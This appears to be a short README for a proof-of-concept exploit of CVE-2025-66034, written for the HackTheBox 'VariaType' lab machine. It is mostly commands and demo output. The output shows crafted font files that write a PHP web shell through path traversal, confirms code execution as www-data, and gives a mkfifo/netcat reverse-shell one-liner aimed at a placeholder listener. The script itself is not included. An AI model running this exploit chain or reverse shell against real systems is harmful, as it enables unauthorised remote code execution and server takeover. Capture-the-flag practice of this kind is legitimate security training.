## https://sploitus.com/exploit?id=20127221-827A-5461-BE26-17D6B06997EB
# CVE-2025-66034-Poc-to-Get-RCE-for-HTB-VariaType
Just run the script, ensure you have added both hosts on the /etc/hosts file.
```bash
python3 exploit.py
```
Enjoy !!!
*Note: This is not my original work. I am keeping it here just for reference.*
# **Demo:**
```bash
python3 exploy.py
[*] Building TTFs...
[+] Built light=656b regular=656b
[*] Trying: ../../../var/www/portal.variatype.htb/public/shell.php
[*] HTTP 200
[+] SHELL: http://portal.variatype.htb/shell.php
[+] `HVAR
/OS/2@
`STATxph
,fvar|
$glyf
head,
6hhea
$hmtx
nameC
????
fuid=33(www-data) gid=33(www-data) groups=33(www-data)
W400Weight
[+] Interactive shell ready
[+] URL: http://portal.variatype.htb/shell.php?c=
variatype>
```
```bash
variatype> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc IP PORT >/tmp/f
```
Get a shell on listener.